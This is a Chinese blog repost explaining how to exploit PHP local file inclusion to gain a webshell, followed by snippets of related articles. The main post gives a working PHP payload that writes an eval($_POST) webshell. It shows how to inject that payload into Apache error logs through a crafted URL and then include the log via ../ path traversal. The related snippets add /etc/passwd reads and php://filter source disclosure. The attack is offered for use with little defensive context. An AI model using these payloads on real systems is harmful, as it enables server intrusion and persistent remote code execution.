PHP中 LFI Local File Include,本地文件包 漏洞

最新推荐文章于 2024-07-29 22:50:36 发布
最新推荐文章于 2024-07-29 22:50:36 发布
阅读量84 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/qunshu/p/3961541.html
版权

在allow_url_include=On就是远程文件包含了,假设这里为off,那就只能本地包含了。

 

1.       包含上传文件

只要目标服务器支持上传,不管是jpg,txt,gif等都可以,在其中包含一句话木马即可,这种方法很简单没什么可说的。

 

3.       日志包含log日志文件

日志包含,这个还是比较实用的,一般apache或者其他的日志都会比较大,而我们为什么能通过日志getwebshell?比如apache,当我们访问一个网站的网页时,页面出错,服务器会记录访问的连接地址,如果我们带入恶意的代码那么这个就会被包含在日志文件中。所以我们一般的利用步骤是:

首先访问一个不可能存在页面并且携带恶意代码,比如邪恶代码为:

<?php fputs(fopen("/www/shell.php","W+"),"<?php eval($_POST[a]?>";?>

将它转换为url编码,然后访问

http://www.81sec.com/+urlencode(邪恶代码)

这个页面肯定不存在,那么在错误日志中就会形成一条这样日志,接下来,我们就包含这条日志:

http://www.81sec.com/test.php?p=../../../../var/logs/apache/www_error.log

apache路径需要自己去猜解,我这里只是给个实例,访问后就会生成一个shell了。

 

 

此位,觉得可行的方法。

转载于:https://www.cnblogs.com/qunshu/p/3961541.html

dengjia1139
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
本地文件漏洞详解
发哥微课堂
06-14 2万+
0x00:漏洞定义 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 文件含分为两种,一种为本地文件含,一种为远程文件含,此篇记录本地文件含。本地文件含(Local File Include),简称 LFI。 0x01:涉及函数 文件含在 php ,涉及到的危险函数有四个,分别是 inclu...
PHPLocal File Include
qwrdxer的博客
08-12 239
PHP Local File Include漏洞 P LFI (Local file include) 利用phpinclude函数 ,含本地的恶意代码文件. 0.环境搭建 使用Apache2 +php7 1. 什么时候会出现LFI漏洞 比如当正常访问的URL含 类似 ?file=xxx.php的时候, 尝试修改file的值为/etc/passwd 或 者c:\windows\system32\drivers\etc\hosts 等,如果返回了对应的文件, 则这个网站就有LFI漏洞 文件含的
BUUCTF--- LFI-------本地文件含(Local File Include)
qq_51550750的博客
01-26 446
LFI-------本地文件含(Local File Include) http://4cb69498-b053-4219-aa61-bf26a34b2e01.node4.buuoj.cn:81/?file=/flag
本地文件含与远程文件漏洞
weixin_41554088的博客
05-04 1817
总结一下 1.文件漏洞分两种:LFIlocal file include)本地文件含 和 RFI(remote file include)远程文件含 2.文件含常用到的函数:include() 和 require() 3.特性:文件含读取文件内容后,会将其当做php执行,所以在文件含时,后缀是什么已经不重要了 4.RFI需要满足满足三个条件:1.需要allow_url_include=On(默认为off) 2.你的木马不存在目标主机上 3.要含的远程地址一般都是txt 这里拿ph
利用本地漏洞执行任意代码
cnbird's blog
01-19 2万+
1 概述   文件含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到含。比如把一系列功能函数都写进fuction.php,之后当某个文件需要调用的时候就直接在文件写上一句就可以调用内部定义的函数。 本地漏洞PHP一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被含的文件,成功利用时可以使web
toxin:LFI(本地文件含)漏洞利用工具
05-30
Toxin 利用特定(但也是常见)类型的本地文件含 (LFI) 漏洞,攻击者可以利用该漏洞利用 PHP 的register_globals设置。 在这种攻击场景,攻击者会制作一个自定义的User-Agent标头,其含任意 PHP 代码,这些...
php 伪造本地文件漏洞的代码
10-28
本文将深入探讨PHP的伪造本地文件漏洞及其防范措施。 #### 二、本地文件含(LFI)概述 本地文件漏洞允许攻击者通过修改动态文件的路径,来读取服务器上的任意文件。这不仅可能导致敏感信息泄露,...
渗透测试技术之本地文件
02-01
通过加强对本地文件含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程,识别和测试LFI漏洞。在Web程序渗透测试,利用本文的技术发现的LFI漏洞是渗透测试的典型漏洞。此外,在...
08_理论8_文件漏洞的原理与实践_20180921
02-10
1. **本地文件含(Local File Inclusion, LFI)** - 当用户可以控制文件路径时,可能会利用此漏洞读取服务器上的任意文件括但不限于配置文件、日志文件等敏感信息。 2. **远程文件含(Remote File ...
信息安全技术基础:本地文件漏洞.pptx
11-01
在网络安全领域,本地文件漏洞Local File Inclusion,简称LFI)是一种常见的安全问题,它涉及到网站应用程序如何处理用户输入来决定要加载的本地文件。这类漏洞允许攻击者通过操纵输入参数,使程序含并执行...
文件漏洞---Web渗透学习
Packet_Lee的博客
04-05 406
文件漏洞的原理: 在开发过程文件含是一种正常的、频繁使用的一种代码编写的正确方式。 以python、php、c语言等为了其主要通过include语句来实现文件含。 从本人开发的经历来看,首先建立网页的框架,然后在其他文件使用include语句将该框架引用到其他文件,能够减少写码的数量,且提高代码的逻辑关系,并能提高代码的通用性和专用性。 但是安全意识比较低的同事为了方便会经常使用i...
lfi读取php,php LFIphp文件源码以及直接post webshell
weixin_29577613的博客
03-28 474
php LFIphp文件源码以及间接post 网站shell假如如下一个场景(1) http://vulnerable/fileincl/example1.php?page=intro.php(该php文件LFI漏洞)(2) 然而你不有央能够upload你的网站shell代码(三) LFI只能读取到非php文件的源码(由于无奈解析履行 只能被爆菊花)(4) 假如你能读取到config.ph...
文件漏洞-知识点
热门推荐
weixin_44257023的博客
08-06 4万+
文件漏洞-知识点,简单了解漏洞
文件含的漏洞、原理、利用
m0_52556798的博客
03-28 4230
最近的总结都比较简单,但不是在水,只是在我学习过程总结的觉得真的有用的知识,还有就是有些代码发不出来我也没办法,所以就有所调整。 文件含原理是啥? 文件漏洞:即file inclusion,意思是文件含,是指当服务器开启allow_url_include选项时, 就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态文件, 此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 讲讲
本地文件漏洞LFI漏洞
weixin_30527551的博客
03-13 629
0x00 前言 本文的主要目的是分享在服务器遭受文件漏洞时,使用各种技术对Web服务器进行攻击的想法。我们都知道LFI漏洞允许用户通过在URL括一个文件。在本文,我使用了bWAPP和DVWA两个不同的平台,其文件漏洞的演示。通过它我以四种不同的方式执行LFI攻击。 0x01基本本地文件含 在浏览器输入目标IP,并在BWAPP内登录(bee:bug),现在选择bug...
php 调用include 方法,php include的使用法详解
weixin_33668998的博客
03-09 4355
include 语句含并运行指定文件。以下文档也适用于 require 。被文件先按参数给出的路径寻找,如果没有给出目录(只有文件名)时则按照 include_path 指定的目录寻找。如果在 include_path 下没找到该文件include 最后才在调用脚本文件所在的目录和当前工作目录下寻找。如果最后仍未找到文件include 结构会发出一条警告;这一点和 require 不同...
【CTF】LFI漏洞总结(PHP本地文件漏洞
HAPPY
07-31 1万+
学习链接: https://www.cnblogs.com/wh4am1/p/6542398.html   发现地址后面的参数直接使用的文件含。  ?file=show.php 为了查看index.php的源文件, 可以使用下面的命令: rlfi.php  ?language=php://filter/read=convert.base64-encode/resource=index.p...
这款ERP云进销存系统,直接封神
魔法标记
07-29 434
一套用php写的ERP云进销存系统,快速部署,直接使用,简直是小公司和个体户的神器。
WordPress原创插件:搜索引擎抓取首图seo图片
最新发布
爱酷码的博客
07-29 243
WordPress原创插件:搜索引擎抓取首图seo图片。
掌握文件含渗透:从入门到精通与实战示例
文件漏洞主要分为低安全级别的本地文件含(Local File Inclusion, LFI)和远程文件含(Remote File Inclusion, RFI)。 在低安全级别渗透,如果服务器配置不当,比如开启了allow_url_include选项,恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值